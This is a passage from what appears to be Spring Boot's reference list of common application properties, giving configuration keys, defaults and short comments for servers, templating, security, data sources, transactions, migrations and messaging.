({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (default to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\tspring.profiles.include= # unconditionally activate the specified comma separated profiles\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources= # sources (class name, package name or XML resource location) to include\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # enable admin features for the application\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (\"detect\", \"always\", \"never\")\n\n\t# LOGGING\n\tlogging.path=\/var\/log\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n\tlogging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\tlogging.pattern.console= # appender pattern for output to the console (only supported with the default logback setup)\n\tlogging.pattern.file= # appender pattern for output to the file (only supported with the default logback setup)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.compression.enabled=false # if response compression is enabled\n\tserver.compression.excluded-user-agents= # list of user-agents to exclude from compression\n\tserver.compression.mime-types=text\/html,text\/xml,text\/plain,text\/css # comma-separated list of MIME types that should be compressed\n\tserver.compression.min-response-size=2048 # minimum response size that is required for compression to be performed\n\tserver.context-parameters.*= # Servlet context init parameters, e.g. server.context-parameters.a=alpha\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.display-name= # the display name of the application\n\tserver.session.persistent=false # true if session should be saved across restarts\n\tserver.session.timeout= # session timeout in seconds\n\tserver.session.tracking-modes= # tracking modes (one or more of \"cookie\" ,\"url\", \"ssl\")\n\tserver.session.cookie.name= # session cookie name\n\tserver.session.cookie.domain= # domain for the session cookie\n\tserver.session.cookie.path= # path of the session cookie\n\tserver.session.cookie.comment= # comment for the session cookie\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie\n\tserver.session.cookie.max-age= # maximum age of the session cookie in seconds\n\tserver.ssl.enabled=true # if SSL support is enabled\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.ciphers= # supported SSL ciphers\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.protocol-header-https-value=https # value of the protocol header that indicates that the incoming request uses SSL\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30; # in seconds\n\tserver.tomcat.max-http-header-size= # maximum size in bytes of the HTTP message header\n\tserver.tomcat.max-threads = 0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding = UTF-8 # character encoding to use for URL decoding\n\tserver.undertow.access-log-enabled=false # if access logging is enabled\n\tserver.undertow.access-log-pattern=common # log pattern of the access log\n\tserver.undertow.access-log-dir=logs # access logs directory\n\tserver.undertow.buffer-size= # size of each buffer in bytes\n server.undertow.buffers-per-region= # number of buffer per region\n server.undertow.direct-buffers=false # allocate buffers outside the Java heap\n server.undertow.io-threads= # number of I\/O threads to create for the worker\n server.undertow.worker-threads= # number of worker threads\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.favicon.enabled=true\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.mvc.ignore-default-model-on-redirect=true # if the content of the \"default\" model should be ignored redirects\n\tspring.mvc.async.request-timeout= # async request timeout in milliseconds\n\tspring.mvc.view.prefix= # MVC view prefix\n\tspring.mvc.view.suffix= # ... and suffix\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\tspring.resources.static-locations= # comma-separated list of the locations that serve static content (e.g. 'classpath:\/resources\/')\n\tspring.resources.chain.enabled=false # enable the Spring Resource Handling chain (enabled automatically if at least a strategy is enabled)\n\tspring.resources.chain.cache=false # enable in-memory caching of resource resolution\n\tspring.resources.chain.html-application-cache=false # enable HTML5 appcache manifest rewriting\n\tspring.resources.chain.strategy.content.enabled=false # enable a content version strategy\n\tspring.resources.chain.strategy.content.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.enabled=false # enable a fixed version strategy\n\tspring.resources.chain.strategy.fixed.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.version= # version string to use for this version strategy\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size.\n\tmultipart.max-request-size=10Mb # Max request size.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.apply-to-primary-object-mapper=true # if the primary mapper should also be configured\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # the encoding of HTTP requests\/responses\n\tspring.http.encoding.enabled=true # enable http encoding support\n\tspring.http.encoding.force=true # force the configured encoding\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper= # the preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string (e.g. yyyy-MM-dd HH:mm:ss), or a fully-qualified date format class name (e.g. com.fasterxml.jackson.databind.util.ISO8601DateFormat)\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy (e.g. CAMEL_CASE_TO_LOWER_CASE_WITH_UNDERSCORES) or the fully-qualified class name of a PropertyNamingStrategy subclass\n\tspring.jackson.deserialization.*= # see Jackson's DeserializationFeature\n\tspring.jackson.generator.*= # see Jackson's JsonGenerator.Feature\n\tspring.jackson.joda-date-time-format= # Joda date time format string\n\tspring.jackson.locale= # locale used for formatting\n\tspring.jackson.mapper.*= # see Jackson's MapperFeature\n\tspring.jackson.parser.*= # see Jackson's JsonParser.Feature\n\tspring.jackson.serialization.*= # see Jackson's SerializationFeature\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization (see Jackson's JsonInclude.Include)\n\tspring.jackson.time-zone # Time zone used when formatting dates. Configured using any recognized time zone identifier, for example \"America\/Los_Angeles\" or \"GMT+10\"\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.excluded-view-names= # comma-separated list of view names that should be excluded from resolution\n\tspring.thymeleaf.view-names= # comma-separated list of view names that can be resolved\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.enabled=true # enable MVC view resolution\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\tspring.thymeleaf.template-resolver-order= # order of the template resolver in the chain\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.charset=UTF-8\n\tspring.freemarker.content-type=text\/html\n\tspring.freemarker.enabled=true # enable MVC view resolution\n\tspring.freemarker.expose-request-attributes=false\n\tspring.freemarker.expose-session-attributes=false\n\tspring.freemarker.expose-spring-macro-helpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.freemarker.request-context-attribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # comma-separated list\n\tspring.freemarker.view-names= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.charset=UTF-8\n\tspring.groovy.template.check-template-location=true # check that the templates location exists\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=text\/html\n\tspring.groovy.template.enabled=true # enable MVC view resolution\n\tspring.groovy.template.prefix=\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/\n spring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.charset=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.enabled=true # enable MVC view resolution\n\tspring.velocity.expose-request-attributes=false\n\tspring.velocity.expose-session-attributes=false\n\tspring.velocity.expose-spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.toolbox-config-location= # velocity Toolbox config location, for example \"\/WEB-INF\/toolbox.xml\"\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=true\n\tspring.mustache.charset=UTF-8\n\tspring.mustache.check-template-location=true\n\tspring.mustache.content-type=UTF-8\n\tspring.mustache.enabled=true # enable MVC view resolution\n\tspring.mustache.prefix=\n\tspring.mustache.suffix=.html\n\tspring.mustache.view-names= # whitelist of view names that can be resolved\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.type=servlet # servlet or filter\n\tspring.jersey.init= # init params\n\tspring.jersey.filter.order=\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cache-seconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.basic.authorize-mode= # ROLE, AUTHENTICATED, NONE\n\tsecurity.filter-order=0\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties]\n\tsecurity.oauth2.client.client-id= # OAuth2 client id\n security.oauth2.client.client-secret= # OAuth2 client secret. A random secret is generated by default\n\n # SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties]\n security.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter\n security.oauth2.sso.login-path= # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if can't be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.jndi-name= # For JNDI lookup (class, url, username & password are ignored when set)\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\tspring.datasource.jmx-enabled=false # Export JMX MBeans (if supported)\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27107)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongodb.database=\n\tspring.data.mongodb.authentication-database=\n\tspring.data.mongodb.grid-fs-database=\n\tspring.data.mongodb.username=\n\tspring.data.mongodb.password=\n\tspring.data.mongodb.repositories.enabled=true # if spring data repository support is enabled\n\tspring.data.mongodb.field-naming-strategy= # fully qualified name of the FieldNamingStrategy to use\n\n\t# EMBEDDED MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/embedded\/EmbeddedMongoProerties.{sc-ext}[EmbeddedMongoProperties])\n\tspring.mongodb.embedded.version=2.6.10 # version of Mongo to use\n\tspring.mongodb.embedded.features=SYNC_DELAY # comma-separated list of features to enable\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.log-dir= # transaction log dir\n\tspring.jta.*= # technology specific configuration\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect=\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating session\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not produces and consumers should be cached\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The postion that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 0 disables the cache\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.datasource.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\t# DATA REST ({spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[RepositoryRestConfiguration])\n\tspring.data.rest.base-path= # base path against which the exporter should calculate its links\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.*= # Any public property available on the auto-configured `Flyway` object\n\tflyway.check-location=false # check that migration scripts location exists\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version= 1 # version to start migration\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.check-change-log-location=true # check the change log location exists\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\tspring.jmx.server=mbeanServer # MBeanServer bean name\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.dynamic=true # create an AmqpAdmin bean\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.requested-heartbeat= # requested heartbeat timeout, in seconds; zero for none\n\tspring.rabbitmq.listener.acknowledge-mode= # acknowledge mode of container\n\tspring.rabbitmq.listener.auto-startup=true # start the container automatically on startup\n\tspring.rabbitmq.listener.concurrency= # minimum number of consumers\n\tspring.rabbitmq.listener.max-concurrency= # maximum number of consumers\n\tspring.rabbitmq.listener.prefetch= # number of messages to be handled in a single request\n\tspring.rabbitmq.listener.transaction-size= # number of messages to be processed in a transaction\n\tspring.rabbitmq.ssl.enabled=false # enable SSL support\n\tspring.rabbitmq.ssl.key-store= # path to the key store that holds the SSL certificate\n\tspring.rabbitmq.ssl.key-store-password= # password used to access the key store\n\tspring.rabbitmq.ssl.trust-store= # trust store that holds SSL certificates\n\tspring.rabbitmq.ssl.trust-store-password= # password used to access the trust store\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.virtual-host= # virtual host to use when connecting to the broker\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database= # database name\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings 